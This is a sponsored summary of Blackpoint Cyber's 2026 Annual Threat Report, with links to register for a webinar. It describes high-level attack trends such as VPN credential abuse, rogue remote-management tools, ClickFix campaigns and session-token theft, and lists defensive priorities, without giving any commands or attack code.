Remote access and trusted administrative tools are now central to both organizational operations and intrusion strategies, according to **Blackpoint Cyber**'s 2026 Annual Threat Report. The report, derived from thousands of security investigations, emphasizes a significant change in attacker tactics: a move away from vulnerability exploitation towards the use of valid credentials, legitimate tools, and routine user actions. The report analyzes these patterns, documents where intrusion activity was disrupted, and provides defensive priorities based on incident response outcomes observed throughout 2025. **➡️ [Register for the webinar](https://blackpointcyber.com/webinar/inside-the-soc-ep002-blackpoint-2026-annual-threat-report/?utm_campaign=37935163-2026_webinar_inside-the-soc&utm_source=bleeping_computer&utm_medium=sponsored_article&utm_content=episode-002)** ## Key Findings From the 2026 Annual Threat Report ### Attackers Are Entering Through Legitimate Access Paths The report indicates that attackers are now more likely to log in using legitimate access methods than to exploit vulnerabilities to gain initial entry. SSL VPN abuse accounted for 32.8% of all identifiable incidents, making it a primary initial access vector. Attackers often authenticate using compromised credentials, resulting in VPN sessions that appear legitimate to security controls. These sessions often grant broad internal access, enabling attackers to move quickly toward high-value systems without immediately triggering alerts. ### Trusted IT Tools Are Being Used Against Organizations The report also highlights the frequent abuse of legitimate Remote Monitoring and Management (RMM) tools for access and persistence. RMM abuse was present in 30.3% of identifiable incidents, with **ScreenConnect** being prominent in over 70% of rogue RMM cases. These tools are commonly used for IT administration, making unauthorized installations difficult to detect without strong visibility. Environments with multiple remote access tools are more susceptible to rogue instances blending in with existing tooling. ### Social Engineering, Not Exploits, Drove the Majority of Incidents While legitimate access paths are crucial, user interaction remains the largest driver of overall incident volume. Fake CAPTCHA and ClickFix campaigns accounted for 57.5% of all identifiable incidents, making them the most common attack pattern. These campaigns rely on deceptive prompts, instructing users to paste commands into the Windows Run dialog, utilizing built-in Windows tools without traditional malware downloads or exploit activity. ### Cloud Intrusions Focused on Session Reuse After MFA Even with multi-factor authentication (MFA) enabled in many cloud environments, account compromise still occurred. Adversary-in-the-Middle phishing accounted for approximately 16% of cloud account disables. Attackers captured authenticated session tokens issued after successful MFA and reused them to access cloud services. From the cloud platform's perspective, this activity appears as a legitimate authenticated session. ## From Initial Access to Network Pivoting Many of these attacks begin with legitimate access, but the real damage occurs during the subsequent stages. In a recent investigation, **Blackpoint Cyber**'s SOC identified a new implant called Roadk1ll, designed to pivot across systems using WebSocket-based communication and maintain access while blending into network traffic. [Save your seat](https://blackpointcyber.com/webinar/inside-the-soc-ep002-blackpoint-2026-annual-threat-report/?utm_campaign=37935163-2026_webinar_inside-the-soc&utm_source=bleeping_computer&utm_medium=ctabox&utm_content=episode-002) ## What These Findings Mean for Security Teams The report highlights a consistent pattern across industries, environments, and attack types: successful intrusions often rely on activity that blends into normal operations. Attackers are abusing everyday workflows such as remote logins, trusted tools, and standard user actions, instead of relying on novel exploits or advanced malware. Based on the analyzed attack chains, the report identifies several defensive priorities: * Treat remote access as high-risk, high-impact activity. * Maintain a complete inventory of approved RMM tools and remove unused or legacy agents. * Restrict unapproved software installations and limit execution from user-writable directories. * Apply Conditional Access controls that evaluate device posture, location, and session risk. These patterns were documented across frequently targeted sectors, including manufacturing, healthcare, MSPs, financial services, and construction. **➡️ [Register to receive the 2026 Annual Threat Report](https://blackpointcyber.com/webinar/inside-the-soc-ep002-blackpoint-2026-annual-threat-report/?utm_campaign=37935163-2026_webinar_inside-the-soc&utm_source=bleeping_computer&utm_medium=sponsored_article&utm_content=episode-002)**